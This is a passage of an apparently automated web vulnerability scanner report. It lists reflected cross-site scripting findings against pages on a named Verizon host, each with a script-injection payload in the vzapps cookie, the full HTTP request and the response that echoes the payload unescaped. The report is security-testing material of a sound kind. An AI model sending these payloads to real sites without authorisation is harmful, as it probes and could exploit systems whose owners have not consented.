Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 64807<script>alert(1)</script>74420ca7421 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX64807<script>alert(1)</script>74420ca7421; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73425
Expires: Sat, 20 Nov 2010 02:00:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:00:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:00:32 GMT; path=/
Set-Cookie: ContextInfo_State=TX64807<script>alert(1)</script>74420ca7421; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:00:32 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:00:32 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:00:32 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX64807<SCRIPT>ALERT(1)</SCRIPT>74420CA7421 </DIV>
...[SNIP]...

1.141. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 701d2'><script>alert(1)</script>a627735ffa9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX701d2'><script>alert(1)</script>a627735ffa9; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73636
Expires: Sat, 20 Nov 2010 01:59:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:59:50 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:59:50 GMT; path=/
Set-Cookie: ContextInfo_State=TX701d2'><script>alert(1)</script>a627735ffa9; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:59:50 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:59:50 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:59:50 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX701D2'><SCRIPT>ALERT(1)</SCRIPT>A627735FFA9 ' />
...[SNIP]...

1.142. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 2493f<script>alert(1)</script>c7f76c215e9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX2493f<script>alert(1)</script>c7f76c215e9; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73632
Expires: Sat, 20 Nov 2010 01:59:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:59:50 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:59:50 GMT; path=/
Set-Cookie: ContextInfo_State=TX2493f<script>alert(1)</script>c7f76c215e9; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:59:50 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:59:50 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:59:50 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX2493F<SCRIPT>ALERT(1)</SCRIPT>C7F76C215E9 </DIV>
...[SNIP]...

1.143. http://www22.verizon.com/Residential/aboutfios/Reviews.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutfios/Reviews.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 38bd2'><script>alert(1)</script>747c1a02b2b was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutfios/Reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX38bd2'><script>alert(1)</script>747c1a02b2b; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73409
Expires: Sat, 20 Nov 2010 02:02:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:02:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:02:02 GMT; path=/
Set-Cookie: ContextInfo_State=TX38bd2'><script>alert(1)</script>747c1a02b2b; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:02:02 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:02:02 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:02:02 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX38BD2'><SCRIPT>ALERT(1)</SCRIPT>747C1A02B2B ' />
...[SNIP]...

1.144. http://www22.verizon.com/Residential/aboutfios/Reviews.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutfios/Reviews.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 2696b<script>alert(1)</script>2ec3c85e5c5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutfios/Reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX2696b<script>alert(1)</script>2ec3c85e5c5; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73405
Expires: Sat, 20 Nov 2010 02:02:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:02:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:02:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX2696b<script>alert(1)</script>2ec3c85e5c5; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:02:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:02:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:02:03 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX2696B<SCRIPT>ALERT(1)</SCRIPT>2EC3C85E5C5 </DIV>
...[SNIP]...

1.145. http://www22.verizon.com/Residential/aboutfios/labs.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutfios/labs.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c17a0'><script>alert(1)</script>5a0a60ca220 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutfios/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXc17a0'><script>alert(1)</script>5a0a60ca220; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78153
Expires: Sat, 20 Nov 2010 02:01:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:01:28 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:01:28 GMT; path=/
Set-Cookie: ContextInfo_State=TXc17a0'><script>alert(1)</script>5a0a60ca220; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:01:28 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:01:28 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:01:28 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC17A0'><SCRIPT>ALERT(1)</SCRIPT>5A0A60CA220 ' />
...[SNIP]...

1.146. http://www22.verizon.com/Residential/aboutfios/labs.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutfios/labs.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 41492<script>alert(1)</script>9893dbf42a1 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutfios/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX41492<script>alert(1)</script>9893dbf42a1; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78149
Expires: Sat, 20 Nov 2010 02:01:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:01:28 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:01:28 GMT; path=/
Set-Cookie: ContextInfo_State=TX41492<script>alert(1)</script>9893dbf42a1; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:01:28 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:01:28 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:01:28 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX41492<SCRIPT>ALERT(1)</SCRIPT>9893DBF42A1 </DIV>
...[SNIP]...

1.147. http://www22.verizon.com/Residential/aboutfios/widgets.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutfios/widgets.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f5336'><script>alert(1)</script>a8f445364b7 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutfios/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXf5336'><script>alert(1)</script>a8f445364b7; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73616
Expires: Sat, 20 Nov 2010 02:01:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:01:19 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:01:19 GMT; path=/
Set-Cookie: ContextInfo_State=TXf5336'><script>alert(1)</script>a8f445364b7; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:01:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:01:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:01:19 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF5336'><SCRIPT>ALERT(1)</SCRIPT>A8F445364B7 ' />
...[SNIP]...

1.148. http://www22.verizon.com/Residential/aboutfios/widgets.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutfios/widgets.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 4423e<script>alert(1)</script>4bcdea2c76b was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutfios/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
